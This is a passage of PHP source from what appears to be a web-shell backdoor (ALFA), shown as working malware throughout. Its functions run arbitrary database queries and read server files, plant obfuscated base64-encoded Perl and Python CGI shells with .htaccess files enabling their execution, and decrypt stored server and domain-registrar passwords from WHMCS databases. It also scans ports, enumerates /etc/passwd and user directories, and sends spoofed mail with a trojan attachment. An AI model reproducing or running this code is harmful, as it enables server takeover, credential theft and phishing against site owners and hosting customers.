echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode(($data[1] != '0'?array('__ALFAKEY'=>$data[1],'__ALFAKEYVAL'=>$data[2]):$fetch)))."'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>");
}
if((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2'])){
$data = json_decode($_POST['alfa2'], true);
$alfadata = $data['__ALFADATA'];
$data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
$keyval = array();
echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data['__ALFATBL'].'</font></p>');
echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
$set = '';
foreach($data as $key => $value){
if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
if($data2['__ALFAKEY']==$key){
$keyval['__ALFAKEY'] = $key;
$keyval['__ALFAKEYVAL'] = $value;
}
$set .= "`$key` = '".addslashes($value)."',";
$value = htmlspecialchars($value);
echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
}
unset($data['__ALFADATA']);

echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY'])?array('__ALFAKEY'=>$keyval['__ALFAKEY'],'__ALFAKEYVAL'=>$keyval['__ALFAKEYVAL']):$data)))."'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>");

if(!isset($data2['__ALFAKEY'])){
$where = '';
foreach($data2 as $key => $value){
if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
$value = addslashes($value);
$where .= "`$key` = '$value' AND ";
}
$where = substr($where, 0, -4);
}else{
$where = "`{$data2['__ALFAKEY']}` = '".addslashes($data2['__ALFAKEYVAL'])."'";
}
$set = substr($set, 0, -1);
$db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where"));
if($db->error())
echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
else echo("Success...!");
}
if($_POST['alfa1']!='edit'&&$_POST['alfa1']!='update'){
echo "<p>Query:</p><form onsubmit='fs(this);return false;'>
<input type='hidden' name='alfa1' value='query'/>
<textarea name='query' style='width:100%;height:100px'>";
echo $_POST['alfa1']!='loadfile'?htmlspecialchars($_POST['alfa2']):'';
echo "</textarea><p><center><input type=submit value=' '></center></p></form>";
}
echo "</td></tr>";
}
echo "</table></form><br/>";
if($_POST['type']=='mysql') {
$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
if($db->fetch())
echo "<form onsubmit=\"fs('3',this.f.value);return false;\"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
}
if(@$_POST['alfa1'] == 'loadfile'){
$file = $db->loadFile($_POST['alfa2']);
echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
}
}else{
echo htmlspecialchars($db->error());
}
echo '</div>';
alfafooter();
}
function alfaselfrm(){
if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
echo(__pre().'<center>');
if(@unlink($GLOBALS['__file_path'])){
echo('<b>Shell has been removed</i> :)</b>');
}else{
echo 'unlink error!';
}
echo('</center>');
}
if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
echo "<div class=header>";
echo "
<center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
echo '<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
echo '</p></center></div>';
}
}
function alfacgishell(){
alfahead();
$div = "";
if(!in_array($_POST['alfa1'],array('perl','py'))){
$div = "</div>";
echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi(\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="runcgi(\'py\');">| Python | </a>';
}
if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
@mkdir('cgialfa',0755);
@chdir('cgialfa');
alfacgihtaccess('cgi');
$name = $_POST['alfa1'].'.alfa';
$perl = '#!/usr/bin/perl   -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';;
$py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
if(__write_file($name,$code)){
@chmod($name,0755);
echo '<iframe src="'.'cgialfa/'.$name.'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
}
}
echo $div;
alfafooter();
}
function alfaWhmcs(){
alfahead();
echo '<div class=header>';
function decrypt($string,$cc_encryption_hash){
$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
$hash_key = _hash($key);
$hash_length = strlen ($hash_key);
$string = __ZGVjb2Rlcg($string);
$tmp_iv = substr ($string, 0, $hash_length);
$string = substr ($string, $hash_length, strlen ($string) - $hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length)
{
$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen ($string))
{
if (($c != 0 AND $c % $hash_length == 0))
{
$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
}
$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
++$c;
}
return $out;
}
function _hash($string)
{
if(function_exists('sha1'))
{
$hash = sha1 ($string);
}
else
{
$hash = md5 ($string);
}
$out = '';
$c = 0;
while ($c < strlen ($hash))
{
$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
$c += 2;
}
return $out;
}
AlfaNum(8,9,10);
echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
<input type='hidden' name='form_action' value='2'>";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
if($_POST['alfa5']!=''){
$db_host=($_POST['alfa7']);
$db_username=($_POST['alfa3']);
$db_password=($_POST['alfa4']);
$db_name=($_POST['alfa5']);
$cc_encryption_hash=($_POST['alfa6']);
echo __pre();
$conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
$query = mysqli_query($conn,"SELECT * FROM tblservers");
$num = mysqli_num_rows($query);
if ($num > 0){
for($i=0; $i <=$num-1; $i++){
$v = @mysqli_fetch_array($query);
$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];
echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
echo "</table><br><br></center>";
}
$query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
$num1 = @mysqli_num_rows($query1);
if ($num1 > 0){
for($i=0; $i <=$num1 -1; $i++){
$v = mysqli_fetch_array($query1);
$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt($v['value'], $cc_encryption_hash);
if ($value==""){
$value=0;
}
echo("<center>Domain Reseller <br><center>");
echo("<center><table border='1'>");
echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
echo "</table><br><br></center>";
}
}
}else{__alert('<font color="red">tblservers is Empty...!</font>');};
}
echo "</div>";
alfafooter();
}
function alfaportscanner(){
alfahead();
echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
<form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
<input type="hidden" name="y" value="phptools">
<div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
<div class="txtfont">Port start: </div> <input id="text" size="5" type="text"  name="start" value="80"/>
<div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
</form></center><br>';
$start = strip_tags($_POST['alfa2']);
$end = strip_tags($_POST['alfa3']);
$host = strip_tags($_POST['alfa4']);
if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
echo __pre();
$packetContent = "GET / HTTP/1.1\r\n\r\n";
if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
else{
$packetContent = str_replace(array("\r","\n"), "", $packetContent);
$packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
}
for($i = $start; $i<=$end; $i++){
$sock = @fsockopen($host, $i, $errno, $errstr, 3);
if($sock){
stream_set_timeout($sock, 5);
fwrite($sock, $packetContent."\r\n\r\n\x00");
$counter = 0;
$maxtry = 1;
$bin = "";
do{
$line = fgets($sock, 1024);
if(trim($line)=="")$counter++;
$bin .= $line;
}while($counter<$maxtry);
fclose($sock);
echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
echo "<p><textarea style='height:140px;width:50%;'>".$bin."</textarea></p></center>";
}
flush();
}
}
echo '</div>';
alfafooter();
}
function alfacgihtaccess($m,$d='', $symname=false){
$readme = "";
if($symname){$readme="\nReadmeName ".trim($symname);}
if($m=='cgi'){
$code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
}elseif($m=='sym'){
$code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
}elseif($m=='shtml'){
$code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
}
@__write_file($d.'.htaccess',$code);
}
function alfabasedir(){
alfahead();
echo '<div class=header>
<center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
$passwd = _alfa_file('/etc/passwd');
if(is_array($passwd)){
$users = array();
$makepwd = alfaMakePwd();
$basedir = @ini_get('open_basedir');
$safe_mode = @ini_get('safe_mode');
if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
$bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
alfaWriteTocgiapi("basedir.alfa",$bash);
$bash_users  = alfaEx("cd alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);
$users = json_decode($bash_users, true);
$x=count($users);
if($x>=2){array_pop($users);--$x;}
}
if(!$basedir&&!$safe_mode){
$x=0;
foreach($passwd as $str){
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = str_replace("{user}", $username, $makepwd);
if(($username != '')){
if (@is_readable($dirz)){
array_push($users,$username);
$x++;
}}}
}
echo '<br><br>';
echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
echo "<b><font color=\"#FFFFFF\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."<br /></font></b>";
echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
foreach($users as $user){
if(empty($user))continue;
$path = str_replace("{user}", $user, $makepwd);
echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
}
}else{echo('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');}
echo '<br><br></b>';
echo '</div>';
alfafooter();
}
function alfamail(){
alfahead();
echo '<div class=header>';
AlfaNum(8,9,10);
echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
$table = array(
'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true),
'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true),
'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),
'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),
'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')
);
create_table($table);
echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){
$mail_to = $_POST['alfa1'];
$mail_from = $_POST['alfa2'];
$mail_subject = $_POST['alfa3'];
$mail_content = $_POST['alfa5'];
$count_mail = (int)$_POST['alfa6'];
$mail_attach = $_POST['alfa7'];
if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
if(!empty($mail_attach)&&@is_file($mail_attach)){
$file = $mail_attach;
$content = __read_file($file);
$content = chunk_split(__ZW5jb2Rlcg($content));
$uid = md5(uniqid(time()));
$filename = basename($file);
$headers  = "From: ".$mail_from." <".$mail_from.">\r\n";
$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
$headers .= "Reply-To: ".$mail_from."\r\n";
$headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n";
$headers .= 'MIME-Version: 1.0' . "\r\n";
$headers .= 'X-Mailer: php' . "\r\n";
$mail_content  = "--".$uid."\r\n";
$mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
$mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
$mail_content .= $mail_content."\r\n\r\n";
$mail_content .= "--".$uid."\r\n";
$mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n";
$mail_content .= "Content-Transfer-Encoding: base64\r\n";
$mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n";
$mail_content .= $content."\r\n\r\n";
$mail_content .= "--".$uid."--";
}else{
$headers  = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
$headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
$headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
$headers .= 'MIME-Version: 1.0' . "\r\n";
$headers .= 'X-Mailer: php' . "\r\n";
}
if(empty($count_mail)||$count_mail<1)$count_mail=1;
if(!empty($mail_from)){echo __pre();
for($i=1;$i<=$count_mail;$i++){
if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
}}else{__alert("Invalid Mail From !");}
}else{__alert("Invalid Mail To !");}
}
echo('</div>');
alfafooter();
}
function alfaziper(){
alfahead();
AlfaNum(8,9,10);
